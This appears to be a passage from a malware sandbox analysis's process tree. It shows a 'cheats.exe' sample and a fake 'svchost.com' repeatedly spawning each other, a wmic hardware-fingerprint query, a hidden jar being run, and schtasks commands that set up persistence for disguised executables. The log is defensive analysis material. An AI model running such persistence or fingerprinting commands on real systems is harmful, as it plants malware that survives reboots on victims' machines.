        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        100⤵
        Modifies registry class
        
        PID:2084
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        101⤵
        Drops file in Windows directory
        
        PID:4856
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        102⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1468
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        103⤵
        Drops file in Windows directory
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        104⤵
        Modifies registry class
        
        PID:184
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        105⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        106⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1544
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        107⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1176
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        108⤵
        Modifies registry class
        
        PID:4960
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        109⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        110⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:1864
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        111⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        112⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:2152
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        113⤵
        
        PID:756
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        114⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:4272
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        115⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        116⤵
        Checks computer location settings
        
        PID:3612
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        117⤵
        Drops file in Windows directory
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        118⤵
        
        PID:732
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        119⤵
        
        PID:164
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        120⤵
        Modifies registry class
        
        PID:972
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        121⤵
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        122⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2256
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        123⤵
        Drops file in Windows directory
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        124⤵
        
        PID:3336
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        125⤵
        
        PID:3628
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        126⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2768
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        127⤵
        System Location Discovery: System Language Discovery
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        128⤵
        Checks computer location settings
        Modifies registry class
        
        PID:1468
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        129⤵
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        130⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1716
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        131⤵
        Drops file in Windows directory
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        132⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2952
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        133⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        134⤵
        Modifies registry class
        
        PID:1504
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        135⤵
        System Location Discovery: System Language Discovery
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        136⤵
        Checks computer location settings
        Modifies registry class
        
        PID:1516
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        137⤵
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        138⤵
        
        PID:436
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        139⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        140⤵
        Checks computer location settings
        Drops file in Windows directory
        Modifies registry class
        
        PID:4220
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        141⤵
        System Location Discovery: System Language Discovery
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        142⤵
        Checks computer location settings
        Drops file in Windows directory
        Modifies registry class
        
        PID:1068
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        143⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        144⤵
        Checks computer location settings
        Drops file in Windows directory
        Modifies registry class
        
        PID:1168
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        145⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        146⤵
        
        PID:4136
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        147⤵
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        148⤵
        System Location Discovery: System Language Discovery
        
        PID:1848
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        149⤵
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        150⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2436
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        151⤵
        Drops file in Windows directory
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        152⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1724
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        153⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        154⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4660
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        155⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        156⤵
        Checks computer location settings
        Modifies registry class
        
        PID:1028
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        157⤵
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        158⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2432
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        159⤵
        
        PID:2532
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        160⤵
        Checks computer location settings
        
        PID:3616
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        161⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        162⤵
        
        PID:3012
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        163⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        164⤵
        Checks computer location settings
        Drops file in Windows directory
        Modifies registry class
        
        PID:8
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        165⤵
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        166⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3664
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        167⤵
        Drops file in Windows directory
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        168⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4092
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        169⤵
        Drops file in Windows directory
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        170⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2436
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        171⤵
        
        PID:3504
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        172⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1052
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        173⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        174⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:2392
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        175⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        176⤵
        Modifies registry class
        
        PID:4760
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        177⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        178⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:4220
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        179⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        180⤵
        Drops file in Windows directory
        
        PID:4916
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        181⤵
        System Location Discovery: System Language Discovery
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        182⤵
        Checks computer location settings
        Modifies registry class
        
        PID:876
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        183⤵
        Drops file in Windows directory
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        184⤵
        Checks computer location settings
        Modifies registry class
        
        PID:208
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        185⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        186⤵
        Checks computer location settings
        
        PID:2404
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        187⤵
        Drops file in Windows directory
        
        PID:512
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        188⤵
        Checks computer location settings
        
        PID:4880
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        189⤵
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        190⤵
        
        PID:1724
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        191⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        192⤵
        
        PID:3320
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        193⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        194⤵
        
        PID:2476
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        195⤵
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        196⤵
        
        PID:1400
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        197⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        198⤵
        
        PID:4432
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        199⤵
        
        PID:4740
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        200⤵
        
        PID:424
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        201⤵
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        202⤵
        
        PID:4636
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        203⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        204⤵
        
        PID:2020
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        205⤵
        
        PID:3612
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        206⤵
        
        PID:3044
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        207⤵
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        208⤵
        
        PID:4508
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        209⤵
        
        PID:1328
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        210⤵
        
        PID:1972
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        211⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        212⤵
        
        PID:4824
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        213⤵
        
        PID:1168
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        214⤵
        
        PID:4436
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        215⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        216⤵
        
        PID:4960
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        217⤵
        
        PID:264
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        218⤵
        
        PID:4956
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        219⤵
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        220⤵
        
        PID:4804
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        221⤵
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        222⤵
        
        PID:4344
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        223⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        224⤵
        
        PID:2392
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        225⤵
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        226⤵
        
        PID:4176
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        227⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        228⤵
        
        PID:2476
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        229⤵
        
        PID:1340
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        230⤵
        
        PID:2032
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        231⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        232⤵
        
        PID:1920
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        233⤵
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        234⤵
        
        PID:540
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        235⤵
        
        PID:832
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        236⤵
        
        PID:1088
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        237⤵
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        238⤵
        
        PID:2888
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        239⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        240⤵
        
        PID:3612
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        241⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        242⤵
        
        PID:4604
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        243⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        244⤵
        
        PID:4088
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        245⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        246⤵
        
        PID:2036
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        247⤵
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        248⤵
        
        PID:4848
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        249⤵
        
        PID:3504
    - - C:\Users\Admin\AppData\Local\Temp\cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cheat.exe"
        5⤵
        Blocklisted process makes network request
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3740
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:1792

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar"
1⤵
PID:4348

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
